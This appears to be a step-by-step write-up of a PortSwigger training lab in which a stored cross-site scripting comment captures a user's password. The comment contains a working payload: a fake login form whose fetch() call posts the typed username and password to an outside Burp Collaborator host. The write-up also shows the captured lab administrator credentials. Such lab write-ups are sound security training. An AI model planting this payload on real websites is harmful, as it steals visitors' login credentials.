Exploiting cross-site scripting to capture passwords

By /
Exploiting cross-site scripting to capture passwords

Exploiting cross-site scripting to capture passwords

1: Access the lab.

Website: https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-capturing-passwords

Exploiting cross-site scripting to capture passwords 1

2: Open the Burp Suite Professional.

3: Open the post.

Exploiting cross-site scripting to capture passwords 2

4: Go to the Collaborator tab in the Burp Suite Professional.

5: Copy the code from the copy to clipboard.

Code example: 7u2n0ffvckyj6w0sa6fnktdpzg5htbh0.oastify.com

Exploiting cross-site scripting to capture passwords 3

6: Paste the payload in the post comment.

Payload: <input name=username id=username>

<input type=password name=password onchange=”if(this.value.length)fetch(‘https://cq6swkb08puo21wx6bbsgy9uvl1mpfd4.oastify.com’,{

method:’POST’,

mode: ‘no-cors’,

body:username.value+’:’+this.value

});”>

Exploiting cross-site scripting to capture passwords 4

7: Take the captured Username and Password.

Username: administrator

Password: rlaj7751lft9s7zeh3fl

Exploiting cross-site scripting to capture passwords 5

8: Go to the My account.

Exploiting cross-site scripting to capture passwords 6

9: Log in to the account.

Exploiting cross-site scripting to capture passwords 7

10: The lab has been completed.

Exploiting cross-site scripting to capture passwords 8

PortSwigger Labs

Must Read

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top